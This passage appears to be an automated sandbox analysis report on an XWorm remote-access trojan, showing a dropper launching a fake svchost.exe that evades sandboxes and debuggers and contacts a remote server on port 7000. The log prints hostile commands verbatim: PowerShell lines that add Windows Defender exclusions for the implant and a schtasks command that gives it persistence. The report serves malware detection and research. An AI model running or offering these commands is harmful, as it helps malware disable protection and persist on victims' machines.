                Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory allocated: 1370000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory allocated: 1AEA0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory allocated: 32F0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory allocated: 1B2F0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory allocated: 13E0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory allocated: 1B2A0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory allocated: 32C0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Memory allocated: 1B2C0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Window / User API: threadDelayed 8792
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Window / User API: threadDelayed 1037
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7134
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2535
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6955
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2648
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6795
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2824
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7896
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1689
                Source: C:\Users\user\Desktop\file.exe TID: 5980 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe TID: 6780 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 3892 | Thread sleep time: -5534023222112862s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe TID: 6856 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2036 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7104 | Thread sleep time: -7378697629483816s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4472 | Thread sleep count: 6955 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3572 | Thread sleep count: 2648 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5876 | Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 312 | Thread sleep count: 6795 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 312 | Thread sleep count: 2824 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1368 | Thread sleep time: -5534023222112862s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4916 | Thread sleep count: 7896 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4320 | Thread sleep count: 1689 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6752 | Thread sleep time: -5534023222112862s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 1004 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 3800 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 4444 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 312 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Users\user\AppData\Roaming\svchost.exe | File Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\AppData\Roaming\svchost.exe | File Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\AppData\Roaming\svchost.exe | File Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\AppData\Roaming\svchost.exe | File Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\AppData\Roaming\svchost.exe | File Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\AppData\Roaming\svchost.exe | File Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\AppData\Roaming\svchost.exe | File Volume queried: C:\ FullSizeInformation
                Source: svchost.exe.0.dr | Binary or memory string: vmware
                Source: file.exe, 00000000.00000002.1669798088.0000000000D39000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}=
                Source: svchost.exe, 00000003.00000002.2922481757.000000001BE00000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllicK
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 3_2_00007FFB4AD37A81 CheckRemoteDebuggerPresent,3_2_00007FFB4AD37A81
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Process queried: DebugPort
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Process token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Process token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Process token adjusted: Debug
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Process token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\svchost.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\file.exe | Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\AppData\Roaming\svchost.exe Network Connect: 208.95.112.1 80
                Source: C:\Users\user\AppData\Roaming\svchost.exe Network Connect: 45.141.26.134 7000
                Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe "C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe"
                Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe Process created: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe "C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe"
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
                Source: svchost.exe, 00000003.00000002.2914398163.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2914398163.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2914398163.0000000002E84000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
                Source: svchost.exe, 00000003.00000002.2914398163.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2914398163.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2914398163.0000000002E84000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
                Source: svchost.exe, 00000003.00000002.2914398163.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2914398163.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2914398163.0000000002E84000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                Source: svchost.exe, 00000003.00000002.2914398163.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2914398163.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2914398163.0000000002E84000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
                Source: svchost.exe, 00000003.00000002.2914398163.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2914398163.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2914398163.0000000002E84000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager2
                Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe Queries volume information: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\svchost.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe Queries volume information: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
